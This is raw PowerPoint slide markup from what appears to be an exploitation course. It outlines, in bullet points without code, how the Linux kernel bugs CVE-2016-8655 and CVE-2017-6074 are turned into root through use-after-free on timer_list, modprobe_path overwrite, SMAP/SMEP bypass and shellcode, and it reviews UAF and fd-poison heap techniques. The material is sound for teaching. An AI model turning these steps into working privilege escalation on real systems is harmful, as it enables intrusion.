                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E472479-2E34-0247-BCB0-33B7F577A9E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3828311" y="2398720"/>
            <a:ext cx="2851458" cy="10005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94D466C-FBEA-9F4B-894F-6983C6A88150}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6634182" y="2178814"/>
            <a:ext cx="2121452" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Timer amount</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE675698-0C90-C74D-A8C7-B442F193F78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5786264" y="2776621"/>
            <a:ext cx="1621926" cy="32122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D2D0661-7EEC-1B40-BCF5-0A5A910B6D89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7408190" y="2937235"/>
            <a:ext cx="2121452" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Callback function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F388C395-442D-1D4D-9489-5B8478D0D7FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3527776" y="3007268"/>
            <a:ext cx="2470756" cy="108420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60059C0-0BD3-744B-AA36-828469DBC085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5998532" y="3768304"/>
            <a:ext cx="2928492" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameter for callback function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31192961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3118-1D18-A845-AA6C-1F50E62DF3A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="0"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CVE-2016-8655 Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D421678A-F26F-6147-8F25-D932AF5C0846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="787090"/>
            <a:ext cx="8344869" cy="2281574"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Race condition leads to UAF on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>timer_lst</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Swap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>in our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fake object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>to control ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’ and ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Call multiple times: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vsyscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>writable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>to modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>modprobe_path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Load kernel module which is root shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 4" descr="Linux kernel 'timer_list' in the networking stack.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2BEF9B9-02A3-D748-AAE8-FD4D8BBFABF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="59301"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435926" y="3440203"/>
            <a:ext cx="7708074" cy="1703297"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82203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3118-1D18-A845-AA6C-1F50E62DF3A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="-90363"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CVE-2017-6074 Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D421678A-F26F-6147-8F25-D932AF5C0846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403924" y="718485"/>
            <a:ext cx="8678083" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Bad reference counting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>leads to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>double free</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>double free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to free a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>timer_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>object </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Swap in a fake </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>timer_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to control function pointer and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Call twice: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable SMAP &amp; SMEP (kernel-land code execution protections) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jump to user-defined shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 4" descr="Linux kernel 'timer_list' in the networking stack.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2BEF9B9-02A3-D748-AAE8-FD4D8BBFABF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="59301"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1435926" y="3440203"/>
            <a:ext cx="7708074" cy="1703297"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35279176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B2A-1853-DC4C-8F91-DA7FFFFD7CD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UAF – Solution Diagram (Review)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1B062E6-0C7D-E74D-BA47-2E2CA23614EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3457737" y="1369219"/>
            <a:ext cx="5686263" cy="2515582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F271F73-3DDC-104B-BA9C-1D75C1191326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1102936"/>
            <a:ext cx="4252404" cy="3963420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to corrupt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Player Struct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UAF object gets corrupted by another object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16146795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90721-318A-C240-AAE0-556D52B9180C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd Poison - Throwback</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F432B81-2BAC-8A4C-97E4-731617EA31C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="2154392"/>
            <a:ext cx="3886200" cy="1693157"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C894F3D-C993-419A-BB94-E958C43DF78C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629150" y="1369219"/>
            <a:ext cx="3886200" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite the data in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>important_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with our data via the fake chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Allocate the chunk and overwrite the data inside ofit">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D857E359-E74E-B544-840A-85464DF8761C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895390" y="2626320"/>
            <a:ext cx="4085551" cy="1516022"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
